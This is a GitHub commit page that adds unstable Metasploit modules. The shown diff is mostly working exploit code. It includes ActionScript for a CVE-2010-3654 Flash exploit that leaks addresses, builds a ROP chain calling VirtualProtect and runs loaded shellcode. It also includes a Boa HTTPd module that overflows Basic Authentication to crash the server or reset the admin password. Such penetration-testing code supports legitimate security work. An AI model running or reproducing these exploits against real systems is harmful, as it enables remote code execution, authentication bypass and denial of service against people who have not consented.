Skip to content

Commit 3737247

Browse files
mubixmubix
committed
unstable branch from msf trunk
hopefully this will get more people using and fixing the module. please submit pulls if you have fixes to any of these, or submit pulls if they are stable directly to the msf team.
1 parent c2be73b commit 3737247

File tree

97 files changed

+16633
-0
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

97 files changed

+16633
-0
lines changed

data/dns_mitm.txt

+1
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
192.168.0.2 google.com

data/source/exploits/CVE-2010-3654/Download.as

+33
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
package poc {
2+
3+
import flash.display.*;
4+
import flash.events.*;
5+
import flash.net.*;
6+
7+
public class Download extends Sprite
8+
{
9+
10+
public var myLoader:URLLoader = new URLLoader();
11+
public var buf:String = new String();
12+
13+
public function init():void
14+
{
15+
var urlRequest:URLRequest = new URLRequest("test.bin");
16+
myLoader.dataFormat = URLLoaderDataFormat.BINARY;
17+
myLoader.addEventListener(Event.COMPLETE, onComplete);
18+
myLoader.load(urlRequest);
19+
}
20+
21+
22+
public function onComplete(e:Event):void
23+
{
24+
buf = myLoader.data;
25+
dispatchEvent(new Event(Event.COMPLETE));
26+
}
27+
28+
public function getBinary():String {
29+
return buf;
30+
}
31+
32+
}
33+
}

data/source/exploits/CVE-2010-3654/Original_Class.as

+29
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
package poc {
2+
public class Original_Class
3+
{
4+
public static function static_func1(leak:uint,imageBase:uint):Original_Class
5+
{
6+
return null;
7+
}
8+
9+
public static function ROPPayload(imageBase:uint, leak2:uint):uint
10+
{
11+
return 1;
12+
}
13+
14+
public function normal_func():uint
15+
{
16+
return 0;
17+
}
18+
19+
public static function strToInt(param_in:String)
20+
{
21+
}
22+
23+
public static function shellcode():uint
24+
{
25+
return 1;
26+
}
27+
}
28+
29+
}

data/source/exploits/CVE-2010-3654/Real_Ref_Class.as

+130
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,130 @@
1+
package poc {
2+
3+
import flash.display.Sprite
4+
import flash.utils.*
5+
6+
public class Real_Ref_Class
7+
{
8+
public static function static_func1(objectLeak:uint ,imageBase:uint):String
9+
{
10+
var address:uint = objectLeak ;
11+
var b:ByteArray = new ByteArray();
12+
b.writeInt(address);
13+
14+
15+
var str:String = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" + String.fromCharCode(b[3],b[2],b[1],b[0]);
16+
return str;
17+
}
18+
19+
public static function ROPPayload(imageBase:uint ,shellcodeAddrLeak:uint):String
20+
{
21+
var b:ByteArray = new ByteArray();
22+
var address:uint = imageBase + 0xfa851;
23+
var t:ByteArray = new ByteArray();
24+
t.writeInt(address);
25+
b.writeByte(t[3]);
26+
b.writeByte(t[2]);
27+
b.writeByte(t[1]);
28+
b.writeByte(t[0]); // stack pivot address (flash10h.ocx)
29+
b.writeUnsignedInt(0x41414141);
30+
b.writeUnsignedInt(0x41414141);
31+
b.writeUnsignedInt(0x41414141);
32+
b.writeUnsignedInt(0x41414141);
33+
b.writeUnsignedInt(0x41414141);
34+
b.writeUnsignedInt(0x41414141);
35+
b.writeUnsignedInt(0x41414141);
36+
b.writeUnsignedInt(0x41414141);
37+
b.writeUnsignedInt(0x41414141);
38+
b.writeUnsignedInt(0x41414141);
39+
b.writeUnsignedInt(0x41414141);
40+
b.writeUnsignedInt(0x41414141);
41+
b.writeUnsignedInt(0x41414141);
42+
b.writeUnsignedInt(0x41414141);
43+
b.writeUnsignedInt(0x41414141);
44+
b.writeUnsignedInt(0x41414141);
45+
b.writeUnsignedInt(0x41414141);
46+
b.writeUnsignedInt(0x41414141);
47+
address = imageBase + 0x034D976;
48+
t = new ByteArray();
49+
t.writeInt(address);
50+
b.writeByte(t[3]);
51+
b.writeByte(t[2]);
52+
b.writeByte(t[1]);
53+
b.writeByte(t[0]); //Fill edi, esi, ebp with parameters (flash10h.ocx)
54+
b.writeUnsignedInt(0x41414141);
55+
b.writeUnsignedInt(0x47474747);
56+
address = shellcodeAddrLeak;
57+
t = new ByteArray();
58+
t.writeInt(address);
59+
b.writeByte(t[3]);
60+
b.writeByte(t[2]);
61+
b.writeByte(t[1]);
62+
b.writeByte(t[0]); // edi Shellcode address
63+
b.writeUnsignedInt(0x00200000); // esi size
64+
b.writeUnsignedInt(0x40000000); // ebp permission
65+
b.writeUnsignedInt(0x41414141);
66+
b.writeUnsignedInt(0x41414141);
67+
b.writeUnsignedInt(0x41414141);
68+
b.writeUnsignedInt(0x41414141);
69+
b.writeUnsignedInt(0x41414141);
70+
b.writeUnsignedInt(0x41414141);
71+
b.writeUnsignedInt(0x41414141);
72+
b.writeUnsignedInt(0x41414141);
73+
b.writeUnsignedInt(0x41414141);
74+
address = imageBase + 0x34D962;
75+
t = new ByteArray();
76+
t.writeInt(address);
77+
b.writeByte(t[3]);
78+
b.writeByte(t[2]);
79+
b.writeByte(t[1]);
80+
b.writeByte(t[0]); // call VirtualProtect (flash10h.ocx)
81+
b.writeUnsignedInt(0x41414141);
82+
b.writeUnsignedInt(0x41414141);
83+
b.writeUnsignedInt(0x41414141);
84+
b.writeUnsignedInt(0x41414141);
85+
b.writeUnsignedInt(0x41414141);
86+
b.writeUnsignedInt(0x41414141);
87+
b.writeUnsignedInt(0x41414141);
88+
b.writeUnsignedInt(0x41414141);
89+
b.writeUnsignedInt(0x41414141);
90+
b.writeUnsignedInt(0x41414141);
91+
b.writeUnsignedInt(0x41414141);
92+
b.writeUnsignedInt(0x41414141);
93+
address = shellcodeAddrLeak;
94+
t = new ByteArray();
95+
t.writeInt(address);
96+
b.writeByte(t[3]);
97+
b.writeByte(t[2]);
98+
b.writeByte(t[1]);
99+
b.writeByte(t[0]); // shellcode address
100+
b.writeUnsignedInt(0x41414141);
101+
b.writeUnsignedInt(0x41414141);
102+
b.writeUnsignedInt(0x41414141);
103+
b.writeUnsignedInt(0x41414141);
104+
b.writeUnsignedInt(0x41414141);
105+
106+
return b.toString();
107+
}
108+
109+
public static function strToInt(param_in:String):uint
110+
{
111+
var a:uint = parseInt(param_in);
112+
a = a | 0x00000007
113+
return a;
114+
}
115+
116+
public static var shell:String = new String();
117+
118+
public static function setShellcode(buf:String):void
119+
{
120+
shell = buf;
121+
}
122+
123+
public static function shellcode():String //return a alphanumeric encoded calc.exe shellcode
124+
{
125+
return shell;
126+
}
127+
128+
}
129+
130+
}

data/source/exploits/CVE-2010-3654/main.as

+93
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,93 @@
1+
// compile >mxmlc -source-path=c:\ C:\poc\main.as
2+
// decompress using SWF_Compressor
3+
// change 07 01 02 07 |01| 03 07 02 05 -> 07 01 02 07 01 |02| 07 02 05
4+
// Shahin [at] abysssec.com
5+
// twitter: @abysssec
6+
7+
package poc
8+
{
9+
10+
import flash.utils.*;
11+
import flash.display.*;
12+
import flash.text.*;
13+
import flash.external.*
14+
import flash.events.*;
15+
16+
public class main extends Sprite
17+
{
18+
19+
public var d:Download = new Download();
20+
21+
function get get_test1():Real_Ref_Class
22+
{
23+
return null;
24+
}
25+
26+
public function main()
27+
{
28+
d.addEventListener(Event.COMPLETE, onLoad);
29+
d.init();
30+
}
31+
32+
public function onLoad(e:Event):void {
33+
var payload:String = d.getBinary();
34+
Real_Ref_Class.setShellcode(payload);
35+
sploit();
36+
}
37+
38+
public function sploit()
39+
{
40+
/////////////////////// LEAK IMAGE BASE ////////////////////////////
41+
42+
var objshellcode:uint = Original_Class.shellcode();
43+
var p_objshellcode:uint = objshellcode & 0xFFFFFFF8;
44+
45+
var str_objshellcode:String = p_objshellcode.toString();
46+
var int_str_objshellcode = Original_Class.strToInt(str_objshellcode);
47+
48+
var z:Number = new Number(int_str_objshellcode);
49+
var b:ByteArray = new ByteArray();
50+
b.writeDouble(z);
51+
var res:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
52+
53+
var imageBase:uint = res - 0X004E2F58;
54+
55+
56+
/////////////////// LEAK SHELLCODE STRING ADDRESS /////////////////
57+
58+
var temp:uint = p_objshellcode + 0x8;
59+
60+
str = temp.toString();
61+
istr = Original_Class.strToInt(str);
62+
63+
z = new Number(istr);
64+
65+
b = new ByteArray();
66+
b.writeDouble(z);
67+
var SHELLCODELeak = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
68+
69+
70+
///////////////////// LEAK ROPPayload ADDRESS /////////////////
71+
72+
var objROPPayload:uint = Original_Class.ROPPayload(imageBase,SHELLCODELeak);
73+
var temp2:uint = objROPPayload & 0xFFFFFFF8;
74+
var str:String = temp2.toString();
75+
var istr = Original_Class.strToInt(str);
76+
77+
temp = temp2 + 0x8;
78+
79+
str = temp.toString();
80+
istr = Original_Class.strToInt(str);
81+
82+
z = new Number(istr);
83+
84+
b = new ByteArray();
85+
b.writeDouble(z);
86+
var ROPPayloadLeak:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7];
87+
88+
var obj:Original_Class = Original_Class.static_func1(ROPPayloadLeak, imageBase);
89+
obj.normal_func();
90+
}
91+
}
92+
93+
}

modules/auxiliary/unstable/boa_auth_dos.rb

+99
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,99 @@
1+
##
2+
# $Id: boa_auth_dos.rb 15014 2012-06-06 15:13:11Z rapid7 $
3+
##
4+
5+
##
6+
# This file is part of the Metasploit Framework and may be subject to
7+
# redistribution and commercial restrictions. Please see the Metasploit
8+
# web site for more information on licensing and terms of use.
9+
# http://metasploit.com/
10+
##
11+
12+
require 'msf/core'
13+
14+
class Metasploit3 < Msf::Auxiliary
15+
16+
include Msf::Exploit::Remote::HttpClient
17+
include Msf::Auxiliary::Dos
18+
19+
def initialize(info = {})
20+
super(update_info(info,
21+
'Name' => 'Boa HTTPd Basic Authentication Overflow',
22+
'Description' =>
23+
%q{
24+
The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
25+
allows denial of service or possibly authentication bypass
26+
via a Basic Authentication header with a user string greater than 127 characters. You must set
27+
the request URI to the directory that requires basic authentication.
28+
},
29+
'Author' =>
30+
[
31+
'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
32+
'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
33+
'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
34+
],
35+
'License' => MSF_LICENSE,
36+
'Version' => '$Revision$',
37+
'References' =>
38+
[
39+
[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
40+
],
41+
'DisclosureDate' => 'Sep 10 2007'))
42+
43+
register_options(
44+
[
45+
Opt::RPORT(80),
46+
OptString.new('URI', [ true, "The request URI", '/']),
47+
OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
48+
], self.class)
49+
end
50+
51+
def check
52+
begin
53+
res = send_request_cgi({
54+
'uri'=>'/',
55+
'method'=>'GET'
56+
})
57+
if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
58+
print_status("Boa Version Detected: #{m[1]}")
59+
return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
60+
return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
61+
return Exploit::CheckCode::Vulnerable
62+
else
63+
print_status("Not a Boa Server!")
64+
return Exploit::CheckCode::Safe # not a boa server
65+
end
66+
rescue Rex::ConnectionRefused
67+
print_error("Connection refused by server.")
68+
return Exploit::CheckCode::Safe
69+
end
70+
end
71+
72+
def run
73+
if check == Exploit::CheckCode::Vulnerable
74+
datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
75+
datastore['BasicAuthPass'] = datastore['PASSWORD']
76+
res = send_request_cgi({
77+
'uri'=> datastore['URI'],
78+
'method'=>'GET'
79+
})
80+
if (res != nil)
81+
print_status("Server still operational... checking to see if password has been overwritten.")
82+
datastore['BasicAuthUser'] = 'admin'
83+
res = send_request_cgi({
84+
'uri'=>datastore['URI'],
85+
'method'=>'GET'
86+
})
87+
if (res.code == 200)
88+
print_status("Access successful with admin:#{datastore['PASSWORD']}")
89+
elsif (res.code != 401)
90+
print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
91+
else
92+
print_status("Access forbidden, this module has failed.")
93+
end
94+
else
95+
print_status("Denial of Service has succeeded.")
96+
end
97+
end
98+
end
99+
end

0 commit comments

Comments
 (0)